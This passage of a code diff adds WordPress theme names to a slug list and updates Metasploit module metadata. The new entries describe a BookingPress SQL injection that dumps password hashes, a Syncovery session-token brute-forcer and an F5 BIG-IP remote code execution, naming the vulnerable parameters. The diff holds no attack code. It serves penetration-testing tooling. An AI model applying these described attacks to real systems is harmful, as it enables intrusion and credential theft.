 tafri-travel
+tafri-travel-blog
 tagebuch
+tagora
+tagora-business
 taha-yoyo
 tai
 tai-simpleblog
@@ -19070,6 +20350,7 @@ tai-simpletheme
 tailor
 tailored
 tailwind
+taina
 tainacan
 tainacan-interface
 taiyariclasses-uri-httpsthemepalace-comdownloadscorporate-education
@@ -19106,6 +20387,7 @@ tannistha
 tantyyellow
 tanuki-base
 tanzaku
+tanzakufse
 tanzanite
 tanzii
 tapied-child
@@ -19139,6 +20421,8 @@ tastybite
 tastyplacement
 tastypress
 tasveer
+tatoo-lite
+tattoo-designer
 tattoo-expert
 tattoo-wow
 tattoos
@@ -19146,6 +20430,7 @@ tatu
 tatva-lite
 tavisha
 taxcan
+taxi-booking
 taylor
 tbiz
 tc-e-commerce-shop
@@ -19202,6 +20487,7 @@ techengage
 techfind
 techieblog
 techified
+techine
 techism
 techlauncher
 techlicioushosting
@@ -19225,6 +20511,7 @@ technogatiadsenseready
 technogenous-lite
 technoholic
 technology
+technology-techup
 technology-travel-food
 technosmart
 technosmart-lite
@@ -19240,6 +20527,7 @@ techtree2
 techtune
 techtunes
 techup
+techup-saw
 techwear-theme-uri-httpthemeisle-comthemeszerif-lite
 techwormcorporate
 techy-people
@@ -19259,14 +20547,22 @@ teczilla-corporate
 teczilla-creative
 teczilla-dark
 teczilla-finance
+teczilla-industry
+teczilla-lite
+teczilla-marketing
 teczilla-organization
 teczilla-portfolio
+teczilla-saas
+teczilla-seo
+teczilla-software
 teczilla-startup
+teczilla-technology
 teczilla-trading
 tedi
 tedxwc
 teen-seventeen
 teerex
+teesa
 tehno-njuz
 tehnonjuz
 tehran
@@ -19293,6 +20589,7 @@ temanyadaengganteng
 temauno
 tembesi
 temka
+temp-mail-x
 temp8
 tempera
 templastic
@@ -19309,8 +20606,10 @@ templateozzamo16
 templatetoaster
 tempo
 temptation
+ten-blog
 tenacity
 tender-spring
+tendo
 tenera
 tenet
 tenocation
@@ -19371,8 +20670,14 @@ tg-green-light
 tg-orange-mini
 tgame
 tgmpa_test
+th-big
+th-big-shop
 th-blogging
+th-hot-shop
+th-jot
+th-open
 th-store
+th-top
 thai-spa
 thallein
 thalliumwp
@@ -19390,6 +20695,7 @@ the-adjustbar-two-column-left-right-side-bar-default-widget
 the-adventure-journal
 the-angle
 the-architect-website
+the-art-gallery
 the-artister
 the-ataraxis
 the-authority
@@ -19446,6 +20752,7 @@ the-event-construction
 the-event-dark
 the-evol
 the-evol-theme
+the-evolution
 the-exe
 the-falcon
 the-fash-blog
@@ -19458,12 +20765,14 @@ the-fundamentals-of-graphic-design
 the-funk
 the-gap
 the-gecko
+the-gig
 the-glory
 the-glory-template
 the-go-green-theme
 the-good-earth
 the-guru-theme
 the-h
+the-headlines
 the-hipster-blog
 the-hotel
 the-html5-boilerplate
@@ -19508,6 +20817,7 @@ the-next-university
 the-nice-one
 the-night-watch
 the-other-blog-lite-red
+the-pack-element
 the-pet-clinic
 the-pinata
 the-portfolio
@@ -19532,6 +20842,8 @@ the-shopping
 the-simple-things
 the-skeleton
 the-sonic
+the-store
+the-styled-blog
 the-sunflower-theme
 the-swallow
 the-theme
@@ -19581,6 +20893,7 @@ thecompany
 thefabbrick
 thefour-lite
 thegujjar
+thehideout
 theia-lite
 thekit
 theleul
@@ -19632,6 +20945,7 @@ themetastico
 themetiger-fashion
 themetim
 themevid
+themework
 themey
 themia-lite
 themia-pro
@@ -19686,6 +21000,7 @@ thewin
 theworldin35mm
 thikcha-bootstrap
 thin-mint
+thinity
 think-blue
 think-me
 thinker
@@ -19696,6 +21011,7 @@ third
 third-eye
 third-son
 third-style
+thirteen-blog
 thirteenmag
 thirtyseventyeight
 this-christmas
@@ -19744,6 +21060,7 @@ tiffany-lite
 tifology
 tiga
 tiger
+tigtiger
 tijaji
 tijarat-business
 tiki-time
@@ -19868,15 +21185,19 @@ toommorel-lite
 toommorel-theme-by-inkthemes
 toothpaste
 top-blog
+top-blogger
 top-business
+top-charity
 top-classic-cars
 top-event
 top-jewelry
 top-language-jobs-2
 top-mag
+top-newspaper
 top-premium-photoblog
 top-shop
 top-store
+top-stories
 top-story
 top-travel
 top5revs
@@ -19919,6 +21240,7 @@ tour
 tour-agency
 tour-operator
 tour-package
+tour-travel-agent
 tour-traveler
 tourable
 tourag
@@ -19935,6 +21257,7 @@ tove
 township-lite
 tp-autumn
 tp-blue
+tp-branded
 tp-iphone
 tp-philosophy
 tp-purpure
@@ -19955,6 +21278,7 @@ trade
 trade-business
 trade-hub
 trade-line
+trade-more
 tradebiz
 tradeup
 trading
@@ -19992,6 +21316,7 @@ transport-lite
 transport-movers
 transport-solutions
 transportation
+transportation-shipment
 transportex
 transporty
 travbo
@@ -20001,6 +21326,7 @@ travel-ace
 travel-advisor
 travel-agency
 travel-agency-booking
+travel-agent
 travel-and-tour
 travel-away
 travel-base
@@ -20016,9 +21342,11 @@ travel-booking
 travel-buzz
 travel-by-frelocaters
 travel-canvas
+travel-charm
 travel-club
 travel-company
 travel-diaries
+travel-diary
 travel-escape
 travel-eye
 travel-eye12312312
@@ -20027,6 +21355,7 @@ travel-guide
 travel-hub
 travel-in-italy
 travel-in-love
+travel-init
 travel-insight
 travel-inspired
 travel-is-my-life
@@ -20054,15 +21383,18 @@ travel-to-egypt
 travel-tour
 travel-tour-pro
 travel-tourism
+travel-trail
 travel-trek
 travel-trip-lite
 travel-ultimate
+travel-vlogger
 travel-voyage
 travel-way
 traveladdict-lite
 traveladdict-liteliye
 travelagency
 travelair
+travelbee
 travelberg
 travelbiz
 travelblog
@@ -20072,10 +21404,13 @@ traveler-blog-lite
 travelera-lite
 travelers
 travelers-blog
+travelholic
 travelia
 travelifestyle
 travelify
 travelingist
+travelism
+travelistic
 travelkit
 travellable
 travellandia
@@ -20095,6 +21430,7 @@ travern
 traverse-blog
 traverse-diary
 traversify-lite
+travey
 travia
 traza
 trcapital-lite
@@ -20116,21 +21452,26 @@ trend-shop
 trending
 trending-blog
 trending-mag
+trending-news
 trendmag
 trendmag-lite
 trendpress
 trendshop
 trendy
+trendy-blog
 trendy-green
+trendy-news
 tressimple
 treville
 treviso
+trex
 trexo
 triad
 trial
 trial-house-bootstrap-classic
 trialhouse-bootstrap-classic
 triangled
+triangulate
 tribal
 tribbiani
 tribe
@@ -20175,6 +21516,7 @@ tropical-beach-theme
 tropical-paradise
 tropicala
 tropicana
+trouvelot
 truble
 true-blue
 true-blue-hue
@@ -20248,6 +21590,7 @@ tutepress
 tutifruti
 tuto
 tutor
+tutor-academy
 tutor-starter
 tutorial
 tutorial-portfolio
@@ -20255,6 +21598,7 @@ tutorial-theme
 tutorialesmanu
 tutorstarter
 tutsup-two
+tutu
 tuấn-hiệp
 tv-boy-explode-black
 tw
@@ -20283,9 +21627,11 @@ tweetpress
 tweetsheep
 twelve
 twelve-14
+twelve-blog
 twelve-pixel
 twentiy-nineteen
 twenty
+twenty-17
 twenty-eightteen
 twenty-eleven
 twenty-eleven-alternative
@@ -20432,6 +21778,7 @@ twenty-twenty-one-child
 twenty-twenty-one-sidebar
 twenty-twenty-onee
 twenty-twenty-plus
+twenty-twenty-two-child
 twenty-twenty20
 twenty-two-five
 twenty11
@@ -20444,6 +21791,7 @@ twentyfourteen
 twentyfourteen-child
 twentynineteen
 twentyseventeen
+twentyseventeen-child
 twentysixteen
 twentysixteen-custom
 twentysixteen-customed-for-kishoredbn
@@ -20460,6 +21808,9 @@ twentytwelve-schema-org-child
 twentytwenty
 twentytwentyone
 twentytwentyone-child-wooden
+twentytwentythree
+twentytwentytwo
+twentytwentytwowcs2022
 twentyxlarge
 twentyxs
 twentyxs-child
@@ -20573,6 +21924,7 @@ ultra-seven
 ultrabootstrap
 ultralight
 ultrapress
+ultravel
 um
 uma
 uma-wp-theme
@@ -20588,6 +21940,7 @@ unakit
 unar
 unar-lite
 unax
+unblock
 unbox-tours
 uncode
 uncode-lite
@@ -20620,7 +21973,9 @@ undistracted-zen
 unfocus-green
 unfocused-blues
 unfold
+unfoldx
 uni-education
+uniblock
 unicare-lite
 unicon
 unicon-lite
@@ -20663,12 +22018,14 @@ universam-store-leader
 universe
 universe2
 university
+university-education-hub
 university-hub
 university-max
 university-web8
 university-wp
 university-zone
 unknown-uri-httpdemo-webulo1us-inabar1is
+unlimita
 unlimited
 unmarked
 unnamed-lite
@@ -20704,7 +22061,9 @@ upcart
 update-tucson
 updown-cloud
 upeo
+upeo-blog
 upeo-business
+upfront
 upfrontwp
 upify
 upliftingblog
@@ -20751,6 +22110,7 @@ utheme
 uticawp
 utieletronica
 utility
+utility-techup
 utilys
 utopia
 utouch-lite
@@ -20771,6 +22131,7 @@ vacation-lite
 vacation-lite1
 vacuous
 vagabond
+vagante
 vaje
 vajra
 valazi
@@ -20805,6 +22166,7 @@ vantage-premium
 vanty
 vape-multipurpose-minimal-shop
 vape-theme
+varela-blog
 varg
 variant
 variant-landing-page
@@ -20850,6 +22212,7 @@ vegeta
 veggie-lite
 veggie-lite1-2
 veggie-poem
+veggo-shop
 vei-do-ceu
 vei-do-saco
 veikals
@@ -20887,6 +22250,7 @@ verbosa
 verdant
 verge
 veridicta
+veritable
 veritas
 verity
 vermillon
@@ -20895,6 +22259,7 @@ veroxa
 versal
 versatile-business
 versatile-business-dark
+versatile-corporate
 versitility
 verso
 verso-lite
@@ -20929,8 +22294,10 @@ vg-sento
 viable-blog
 viable-fame
 viable-lite
+viaggiando
 viaggio-lite
 viala
+viandante
 viavi-blog
 vibe
 vibefolio-teaser-10
@@ -20948,14 +22315,19 @@ victoriana
 video
 video-adventure-theme
 video-blog
+video-podcasting
 video-sport-total
+video-streaming
 video-theme-adventure
 videoblog
 videobuzz
+videocast
 videofire
 videofy
 videographex
 videography
+videography-filmmaker
+videolife
 videomag
 videomaker
 videomax
@@ -20963,6 +22335,7 @@ videonowlite
 videoplace
 videopress
 videopro-shared-by-themes24x7-com
+videoshare
 videostories
 videoxl-free
 vidmag
@@ -20987,6 +22360,8 @@ viktor-classic
 viktor-lite
 villa-estate
 village
+villanelle
+villar
 vilva
 vina
 vinay
@@ -21005,6 +22380,7 @@ vintage-stamps-theme
 vintage-wall
 vintage1-camera1
 vintagemag
+vinyl-news-mag
 violet
 violet-fashion-theme
 violinesth
@@ -21054,6 +22430,7 @@ vishnu
 visia-store
 vision
 vision-lite
+visionwp
 visitpress
 viso
 viso-theme
@@ -21085,6 +22462,7 @@ vivex
 vivid-blog
 vivid-night
 vivita
+vivre
 vixka
 vixy-catch
 vizuit
@@ -21139,6 +22517,7 @@ vw-app-lite
 vw-application
 vw-automobile-lite
 vw-bakery
+vw-bakery-blocks
 vw-blog-magazine
 vw-book-store
 vw-car-rental
@@ -21149,6 +22528,7 @@ vw-consulting
 vw-corporate-business
 vw-corporate-lite
 vw-corporate-lite-2
+vw-dark
 vw-dentist
 vw-driving-school
 vw-eco-nature
@@ -21169,7 +22549,10 @@ vw-healthcare
 vw-hospital-lite
 vw-hotel
 vw-interior-designs
+vw-job-board
 vw-kids
+vw-kids-store
+vw-kindergarten
 vw-landing-page
 vw-lawyer-attorney
 vw-life-coach
@@ -21180,6 +22563,7 @@ vw-minimalist
 vw-mobile-app
 vw-mobile-app-red-canoa
 vw-newspaper
+vw-nutritionist-coach
 vw-one-page
 vw-painter
 vw-parallax
@@ -21229,9 +22613,11 @@ w018
 w1redtech
 w3css
 w3css-starter
+w3csspress
 w3t-fuseki
 w7c_iz
 wabc
+wabi
 wabi-sabi
 wacko
 wacool-hack-on-the-net
@@ -21245,6 +22631,8 @@ walili
 walker-charity
 walkermag
 walkernews
+walkerpress
+walkershop
 wall-street
 wallflower
 wallgreen
@@ -21266,6 +22654,7 @@ wapuu1-child
 waqas
 ward
 wardrobe
+warehouse-cargo
 warm-heart
 warm-home
 warm-ribbon
@@ -21279,6 +22668,7 @@ washing-center
 washington
 wasif
 wasteland
+watch-store
 watchertheme
 watches
 water
@@ -21287,6 +22677,7 @@ water-lily
 water-mark
 water-sports-club
 watercolor
+waterlava
 waterloo
 waternymph-and-dolphin
 waterside
@@ -21321,16 +22712,20 @@ web-20
 web-20-blue
 web-20-pinky
 web-20-simplified
+web-agency-elementor
 web-app
 web-artist
 web-conference
 web-design
 web-design-web8
+web-designer
 web-developer
+web-developer-elementor
 web-development
 web-grapple
 web-host
 web-hosting
+web-hosting-lite
 web-hosting-theme
 web-log
 web-minimalist-200901
@@ -21383,6 +22778,7 @@ webstarslite
 webstarterkitthirteen
 webstore
 webstrap
+webstudio-gtns
 webswp
 webtacs-1
 weburangbogor
@@ -21392,12 +22788,14 @@ wecare
 wecodeart
 wecodeart-framework
 wecodeart-old
+weddi-pro
 wedding
 wedding-band
 wedding-bells
 wedding-bells-lite
 wedding-bride
 wedding-couples
+wedding-hall
 wedding-happily-ever-after
 wedding-journal
 wedding-party
@@ -21419,10 +22817,14 @@ wedshot
 wefoster
 weh-lite
 wehpy
+wei
+weight-loss
 weight-loss-tea
 welcome
 welcomeholidays-uri-httpswordpress-orgthemestwentyseventeen
+welding-services
 well-being
+well-book
 well-built
 well-rounded-redux-blue
 wellbeing
@@ -21432,13 +22834,16 @@ wellness
 wellness-child
 wellness-coach-lite
 wen-associate
+wen-biz
 wen-business
 wen-commerce
 wen-corporate
 wen-travel
 wen-travel-blog
+wen-travel-corporate
 wen-travel-dark
 wen-travel-modern
+wen-travel-photography
 wepora
 werka
 west
@@ -21526,6 +22931,7 @@ whitey08-green
 whitish
 whitish-lite
 whitney
+wholesales
 wholly
 whoop
 why-hello-there
@@ -21634,6 +23040,7 @@ wittgenstein
 wix
 wiz-ecommerce
 wiziapp-smooth-touch
+wk-finance
 wk-wow
 wkeducation
 wlow
@@ -21649,6 +23056,7 @@ womenmagaz
 wonder
 wondrous
 woo
+woo-shop
 woobie
 wooclean
 woocommerce-starter
@@ -21659,6 +23067,8 @@ wood-master
 wood-people
 wood-theme
 woodberry
+woodcraft-lite
+woodcut
 wooden
 wooden-and-white-style
 wooden-by-jason
@@ -21682,12 +23092,14 @@ woodsauce
 woodword
 woodwork-lite
 woodworking
+woodworking-carpenter
 woody
 woody-smooth
 wooeco
 wooketing
 woolab
 woomart
+wooshop-wp
 woosti
 woostifi
 woostify
@@ -21744,6 +23156,7 @@ wordpress-unix
 wordpress-video-theme
 words
 words-blog
+words-lite
 wordsmith
 wordsmith-anvil
 wordsmith-blog
@@ -21755,9 +23168,11 @@ wordzilla
 worf
 work-and-travel
 workart
+workart-business
 workflow
 workfree
 working-papers
+workout-lite
 workpress
 worksblog
 workspace-theme
@@ -21820,6 +23235,7 @@ wp-boxes
 wp-brown
 wp-bs-mix-news
 wp-business
+wp-business-builder
 wp-c_green
 wp-castle
 wp-casual
@@ -21896,7 +23312,9 @@ wp-media-twentyfive
 wp-meliora
 wp-metrics
 wp-metroui
+wp-minimalist
 wp-mint-magazine
+wp-moose
 wp-movies
 wp-mozilla-community-theme-v2
 wp-my-business
@@ -21904,6 +23322,7 @@ wp-nathy
 wp-news-classic
 wp-news-stream
 wp-newsmagazine
+wp-newspaper
 wp-nice-mix
 wp-notebook
 wp-notes
@@ -22009,12 +23428,15 @@ wpbyd
 wpcake
 wpcan
 wpchimp-countdown
+wpckid
 wpclick
 wpcmart
 wpcmedical
 wpcomic
+wpconfigurator
 wpcount
 wpcouponcode
+wpcpet
 wpcplant
 wpcrest
 wpcrux
@@ -22034,6 +23456,7 @@ wpf-authority
 wpf-flaty
 wpf-ultraresponsive
 wpfastslide
+wpflavour
 wpfolio
 wpfolio-three
 wpgalaxy-magazine
@@ -22041,12 +23464,14 @@ wpgist
 wpgrass
 wpgumby
 wpherald_lite
+wphester
 wpi-aboutme
 wpideo
 wpindexatic
 wping-metro
 wpj
 wpjobman
+wpkites
 wpl-twentyeight
 wplab-pro-wpcms
 wplabo-aries
@@ -22128,6 +23553,7 @@ writee
 writee-child
 writee-grid
 writee-parsi
+writemag
 writer
 writer-blog
 writera
@@ -22138,6 +23564,7 @@ writers-blogily
 writers-desk
 writers-quill
 writerstrap
+writeup
 writhem-blog
 writing-board
 writing-desk
@@ -22189,9 +23616,11 @@ x-mas
 x-portfolio
 x-shop
 x-store
+x-t9
 x-view
 x2
 x2-lite
+x3p0-reflections
 x6
 xabstract
 xaklin
@@ -22218,6 +23647,7 @@ xiando-one
 xianrensea
 xicoofficial
 xid1theme
+xidea
 xin
 xin-magazine
 xinxin
@@ -22242,6 +23672,8 @@ xpand-blog
 xpand-news
 xperson-lite
 xpinkfevertlx
+xpomagazine
+xposenews
 xpressmag
 xpro
 xproweb
@@ -22323,6 +23755,7 @@ yepza
 yes-co-ores-theme
 yesp
 yeti-5
+yeti-blog
 yeuloli
 yeyita
 yg-desire
@@ -22330,10 +23763,12 @@ yhsnews
 yifengxuan
 yinyang
 yith-proteo
+yith-wonder
 yleave
 ymac
 ymflyingred
 ymoo
+ynet-contractor
 yo-manga
 yo-yo-po
 yo_fik
@@ -22341,6 +23776,7 @@ yocto
 yoga
 yoga-coach
 yoga-fitness
+yoga-park
 yoga-studio
 yoga_guru
 yogaclub-lite
@@ -22359,7 +23795,9 @@ yomel
 yonarex
 yoneko
 yoo-developer
+yordered-desktop
 york-lite
+york-press
 yosemite
 yosemite-lite
 yosemite-lite1
@@ -22387,8 +23825,13 @@ yugen
 yui
 yui-grid-css
 yuiyui
+yuki
+yuki-agency
+yuki-magazine
 yukti
 yule
+yuma
+yuma-personal
 yume
 yume-tan
 yummy
@@ -22463,6 +23906,7 @@ zeestyle
 zeestylepro
 zeesynergie
 zeetasty
+zeever
 zeevision
 zeko-lite
 zelia
@@ -22485,6 +23929,7 @@ zenga-club
 zengardenwedding
 zenhabits-reloaded
 zenimalist
+zenithwp
 zenlife
 zenlite
 zenmacrame
@@ -22533,6 +23978,7 @@ zetaone
 zeus
 zfirst
 zgrey
+zheme
 zhuti
 zica-lite-one-page
 zifer-child
@@ -22570,7 +24016,9 @@ zm-tech-black-red
 zm-theme
 zmartoffcial
 zmooncake
+zmt-modular
 znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
+zodiac-astrology
 zodiac-lite
 zoe
 zoko
@@ -5220,7 +5220,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-10-28 09:19:43 +0000",
+    "mod_time": "2022-11-14 12:27:38 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -13777,7 +13777,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/upnp/miniupnpd_dos",
@@ -15496,7 +15496,7 @@
      "Lnk Creation Code by Mubix",
      "asoto-r7"
    ],
-    "description": "This module dependent on the given filename extension creates either\n          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n          to the the specified remote host, causing SMB connections to be initiated\n          from any user that views the file.",
+    "description": "This module dependent on the given filename extension creates either\n          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n          to the specified remote host, causing SMB connections to be initiated\n          from any user that views the file.",
    "references": [
      "URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018",
      "URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/",
@@ -15512,7 +15512,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/fileformat/multidrop.rb",
    "is_install_path": true,
    "ref_name": "fileformat/multidrop",
@@ -19696,7 +19696,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-07 10:28:43 +0000",
+    "mod_time": "2022-12-07 10:48:07 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -19791,7 +19791,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-10-28 14:16:49 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21938,6 +21938,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/wp_bookingpress_category_services_sqli": {
+    "name": "Wordpress BookingPress bookingpress_front_get_category_services SQLi",
+    "fullname": "auxiliary/gather/wp_bookingpress_category_services_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-02-28",
+    "type": "auxiliary",
+    "author": [
+      "cydave",
+      "destr4ct",
+      "jheysel-r7"
+    ],
+    "description": "The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data\n          in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action\n          (available to unauthenticated users), prior to using it in a dynamically constructed SQL query.\n          As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive\n          data from the backend database such as usernames and password hashes.\n\n          This module uses this vulnerability to dump the list of WordPress users and their associated\n          email addresses and password hashes for cracking offline.",
+    "references": [
+      "URL-https://github.com/destr4ct/CVE-2022-0739",
+      "WPVDB-388cd42d-b61a-42a4-8604-99b812db2357",
+      "CVE-2022-0739"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-11-15 09:08:38 +0000",
+    "path": "/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/wp_bookingpress_category_services_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/wp_ultimate_csv_importer_user_extract": {
    "name": "WordPress Ultimate CSV Importer User Table Extract",
    "fullname": "auxiliary/gather/wp_ultimate_csv_importer_user_extract",
@@ -34317,7 +34377,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -35108,6 +35168,119 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/syncovery_linux_login": {
+    "name": "Syncovery For Linux Web-GUI Login Utility",
+    "fullname": "auxiliary/scanner/http/syncovery_linux_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module will attempt to authenticate to Syncovery File Sync & Backup Software For Linux Web-GUI.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-16 13:34:06 +0000",
+    "path": "/modules/auxiliary/scanner/http/syncovery_linux_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/syncovery_linux_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/http/syncovery_linux_token_cve_2022_36536": {
+    "name": "Syncovery For Linux Web-GUI Session Token Brute-Forcer",
+    "fullname": "auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-06",
+    "type": "auxiliary",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI\n          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).\n          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.\n          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time\n          of the login instead of a random token.\n          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36536"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-12-14 08:59:53 +0000",
+    "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/synology_forget_passwd_user_enum": {
    "name": "Synology Forget Password User Enumeration Scanner",
    "fullname": "auxiliary/scanner/http/synology_forget_passwd_user_enum",
@@ -35412,7 +35585,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-27 15:35:34 +0000",
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
@@ -45943,7 +46116,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-07-19 14:47:39 +0000",
+    "mod_time": "2022-10-15 16:42:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
@@ -46159,7 +46332,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-10 10:58:14 +0000",
+    "mod_time": "2022-12-12 16:13:45 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -47037,7 +47210,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
@@ -47117,7 +47290,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
@@ -47155,7 +47328,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
@@ -51007,7 +51180,7 @@
    "author": [
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "This module provides a Rex based DNS service which can store static entries,\n        resolve names over pivots, and serve DNS requests across routed session comms.\n        DNS tunnels can operate across the the Rex switchboard, and DNS other modules\n        can use this as a template. Setting static records via hostfile allows for DNS\n        spoofing attacks without direct traffic manipulation at the handlers. handlers\n        for requests and responses provided here mimic the internal Rex functionality,\n        but utilize methods within this module's namespace to output content processed\n        in the Proc contexts via vprint_status.",
+    "description": "This module provides a Rex based DNS service which can store static entries,\n        resolve names over pivots, and serve DNS requests across routed session comms.\n        DNS tunnels can operate across the Rex switchboard, and DNS other modules\n        can use this as a template. Setting static records via hostfile allows for DNS\n        spoofing attacks without direct traffic manipulation at the handlers. handlers\n        for requests and responses provided here mimic the internal Rex functionality,\n        but utilize methods within this module's namespace to output content processed\n        in the Proc contexts via vprint_status.",
    "references": [

    ],
@@ -51021,7 +51194,7 @@
      "dns"
    ],
    "targets": null,
-    "mod_time": "2022-03-09 13:31:46 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/auxiliary/server/dns/native_server.rb",
    "is_install_path": true,
    "ref_name": "server/dns/native_server",
@@ -61839,6 +62012,125 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800": {
+    "name": "F5 BIG-IP iControl Authenticated RCE via RPM Creator",
+    "fullname": "exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a newline injection into an RPM .rpmspec file\n          that permits authenticated users to remotely execute commands.\n\n          Successful exploitation results in remote code execution\n          as the root user.",
+    "references": [
+      "CVE-2022-41800",
